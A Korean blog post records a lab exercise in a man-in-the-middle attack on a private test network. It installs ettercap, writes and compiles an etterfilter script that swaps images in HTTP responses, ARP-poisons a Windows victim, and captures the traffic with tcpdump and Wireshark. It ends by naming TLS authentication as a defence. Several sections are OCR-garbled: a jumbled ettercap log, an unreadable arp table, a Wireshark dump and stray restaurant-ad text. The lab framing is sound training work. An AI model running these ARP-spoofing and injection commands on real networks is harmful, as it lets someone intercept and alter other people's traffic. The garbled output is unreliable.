2020. 7. 16.

[Network] MITM 실습


  1. 구성과 계획
  • 네트워크 구성도
web - 192.168.10.113/00:0C:29:A9:51:06
tcpdump att6 - 192.168.10.149/00:0C:29:C6:9A:42
agent att5 - 192.168.10.148/00:0C:29:5D:87:05
피해자 win10 - 192.168.10.191/4c:ed:fb:98:a5:b9

  • 과정 정리
step1. web 사이트 셋팅
step2. att5 ettercap 설치
step3. att5 필터 파일 생성
step4. att6 tcpdump
step5. att5 ettercap 공격
step6. win10 웹사이트 접속
step7. wireshark 패킷 분석

  1. 관련내용정리
MITM : 중간자 공격이라 불린다. 중간에 패킷을 가로채서 변조
etterfilter : MITM 공격을 하기 위한 프로그램

  1. 실습과정
step1. web 사이트 셋팅
아파치 서버에 그림파일을 셋팅

step2. att5 ettercap 설치
yum install -y ettercap

step3. att5 필터 파일 생성
vi filter.txxt
if (ip.proto == TCP && tcp.src == 80) {
replace("img src=", "img src=\"http://192.168.10.113/sb1.png\"");
replace("IMG SRC=", "img src=\"http://192.168.10.113/sb1.png\"");
msg("Replaced the pic. \n");
}
우회할 웹서버 주소와 해당 파일 경로를 넣는다.

etterfilter -o filter.ef filter.txt
컴파일한다.
step4. att6 tcpdump
tcpdump -i eth0 -xX -w mitm.cap

step5. ettercap 공격
// 5버전
ettercap -T -q -F filter.ef -M ARP /192.168.10.191/ //
// 6버전
ettercap -T -q -F filter.ef -M ARP /192.168.10.191// ///
해당 PC 공격해본다.

step6. 접속 확인
찌의 숨머있는 맷집을 추천힙니다 (미 꼬막식당 식 I 보성군 벌교옵 3.6 49몁 참여 卜메서 뱦 다투어 콸범할 점도로 그 먓를 인•성뱓은 거시 !1卜식당은 OH일 아침 벌교 $24 추천밋집 자세히보기 」톁 밋집탛방! ,대보기 R alt= 피 모니(P巳口ny) 연남점 카페/주점 마포구 연남동

공격자는 웹사이트에 접속시 그림이 바뀔때마다 진행사항이 뜬다.
root@localhost:- 192.168. la. 191: 5412Ø .17ø:443 TX: 45 192.168.1e.191: 54121 192.168.1e.191: 54126 192.168.1e.191: 54127 192.168.1e.191: 54129 192.168.1e.191: 64461 192.168. la. 191: 53611 172.217.31 192.168.113.191:54125 - 192.168.113.191:54128 - 211.53.21ø.21:8ø 192.168.1e.191: 53653 211.53.21e.21:8e 192.168.1e.113:8e 211.53.21e.21:8e 211.53.21e.21:8e 211.53.21e.21:8e 211.53.21ø.21:8ø 172.217.26 .14 239.255.255.25ø:19øø 8.8.4.4 216.58.197.228:443 : 443 : 443 T T T T T T Ll Ll Ll Ll killed killed c 10 sed a c tive a c tive a c tive a c tive a c tive a c tive TX: TX: TX: TX: TX: TX: TX: TX : TX: 59769 22749ø 1532 4448 1941 1947 se 25449 696 844 5674 Replaced Replaced Replaced Replaced Replaced Replaced Replaced Replaced Replaced Re placed the the the the the the the the the the

피해자 arp 테이블
arp -a
인터페이스: 1딘2 10.1딘1 인터넷 주소 10.3 10.딘 10.11 10.12 10.21 10.77 10.102 10.103 10.106 10.107 10.10B 10.10딘 10.111 10.112 10.113 10.115 10.116 10.117 10.11B 10.11딘 10.121 10.122 10.123 10.126 10.127 10.12B 10.12딘 10.131 10.132 10.133 10.135 10.141 10.142 10.143 10.145 10.146 10.147 10.14B 10.14딘 10.151 10.152 10.153 10.155 10.161 10.162 10.163 16B 1딘2 1딘2 1딘2 1딘2 1딘2 1딘2 1딘2 1딘2 1딘2 1딘2 1딘2 1딘2 1딘2 1딘2 1딘2 1딘2 1딘2 1딘2 1딘2 1딘2 1딘2 1딘2 1딘2 1딘2 1딘2 1딘2 1딘2 1딘2 1딘2 1딘2 1딘2 1딘2 1딘2 1딘2 1딘2 1딘2 1딘2 1딘2 1딘2 1딘2 1딘2 1딘2 1딘2 1딘2 1딘2 1딘2 1딘2 1딘2 1딘2 1딘2 1딘2 1딘2 1딘2 1딘2 1딘2 16B 16B 16B 16B 16B 16B 16B 16B 16B 16B 16B 16B 16B 16B 16B 16B 16B 16B 16B 16B 16B 16B 16B 16B 16B 16B 16B 16B 16B 16B 16B 16B 16B 16B 16B 16B 16B 16B 16B 16B 16B 16B 16B 16B 16B 16B 16B 16B 16B 16B 16B 16B 16B 16B 16B 10. 10.104 10.114 10.120 10.124 10.134 10.150 10.154 10.164 Oxa 물리적 주소 00-0=2딘-듬d-日7-0듬 00-0=2딘-듬d-日7-0듬 00-fa-21-크딘-日f-d7 00-0=2딘-듬d-日7-0듬 00-0=2딘-듬d-日7-0듬 00-0=2딘-듬d-日7-0듬 00-0=2딘-듬d-日7-0듬 00-0=2딘-듬d-日7-0듬 00-0=2딘-듬d-日7-0듬 00-0=2딘-듬d-日7-0듬 00-0=2딘-듬d-日7-0듬 00-0=2딘-듬d-日7-0듬 00-0=2딘-듬d-日7-0듬 00-0=2딘-듬d-日7-0듬 00-0=2딘-gg-딘2-日4 00-0=2딘-듬d-日7-0듬 00-0=2딘-a딘-듬 1-06 00-0=2딘-듬d-日7-0듬 00-0=2딘-듬d-日7-0듬 00-0=2딘-1 e-77-4a 00-0=2딘-듬d-日7-0듬 00-0=2딘-듬d-日7-0듬 00-0=2딘-듬d-日7-0듬 00-0=2딘-듬d-日7-0듬 00-0=2딘-듬d-日7-0듬 00-0=2딘-듬7-16-2e 00-0=2딘-b뉴cd-7d 00-0=2딘-fc-64-62 00-0=2딘-듬d-日7-0듬 00-0=2딘-듬d-日7-0듬 00-0=2딘-듬d-日7-0듬 00-0=2딘-듬d-日7-0듬 00-0=2딘-듬d-日7-0듬 00-0=2딘-듬d-日7-0듬 00-0=2딘-듬d-日7-0듬 00-0=2딘-듬d-日7-0듬 00-0=2딘-듬d-日7-0듬 00-0=2딘-듬d-日7-0듬 00-0=2딘-듬d-日7-0듬 00-0=2딘-듬d-日7-0듬 00-0=2딘-듬d-日7-0듬 00-0=2딘-日1-bB-e1 00-0=2딘-듬d-日7-0듬 00-0=2딘-듬d-日7-0듬 00-0=2딘-듬d-日7-0듬 00-0=2딘-듬d-日7-0듬 00-0=2딘-듬d-日7-0듬 00-0=2딘-듬d-日7-0듬 00-0=2딘-듬d-日7-0듬 00-0=2딘-듬d-日7-0듬 00-0=2딘-듬d-日7-0듬 00-0=2딘-듬d-日7-0듬 00-0=2딘-듬d-日7-0듬 00-0=2딘-듬d-日7-0듬 00-0=2딘-듬d-日7-0듬

step7. wireshark 패킷 분석
wireshark on
  • filtering : ip.addr == 192.168.10.191
192. 168.10. 191 192. 168.10. 113 192. 168.10. 113 192. 168.10. 191 192. 168.10. 113 192. 168.10. 191 192. 168.10. 112 192. 168.10. 191 192. 168.10. 191 192. 168.10. 112 192. 168.10. 191 192. 168.10. 112 192. 168.10. 112 192. 168.10. 191 192. 168.10. 112 192. 168.10. 191 192. 168.10. 111 192. 168.10. 191 192. 168.10. 191 192. 168.10. 111 192. 168.10. 191 192. 168.10. 111 192. 168.10. 111 192. 168.10. 191 192. 168.10. 109 192. 168.10. 191 192. 168.10. 191 192. 168.10. 109 192. 168.10. 191 192. 168.10. 109 192. 168.10. 109 192. 168.10. 191 192. 168.10. 109 192. 168.10. 191 192. 168.10. 108 192. 168.10. 191 ICMP ICMP ICMP ICMP ICMP ICMP ICMP ICMP ICMP ICMP ICMP ICMP ICMP ICMP ICMP ICMP ICMP ICMP 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 Echo Echo Echo Echo Echo Echo Echo Echo Echo Echo Echo Echo Echo Echo Echo Echo Echo Echo (ping) (ping) (ping) (ping) (ping) (ping) (ping) (ping) (ping) (ping) (ping) (ping) (ping) (ping) (ping) (ping) (ping) (ping) request reply reply request reply request reply reply request reply request reply request reply request reply reply request
ICMP 패킷을 보내 모든 경로에서 오는 데이터를 변조하기 위해서 MAC address 변조한다.

  1. 결론
MITM 보면 모든 통신을 검증하고 인증하여야한다는 점이다.
MITM 방지하는 방법은 TLS 이용하여 인증을 하는 방법이 있다.

시간:
라벨: ,

댓글 없음:

댓글 쓰기

피드 구독하기: 댓글 (Atom)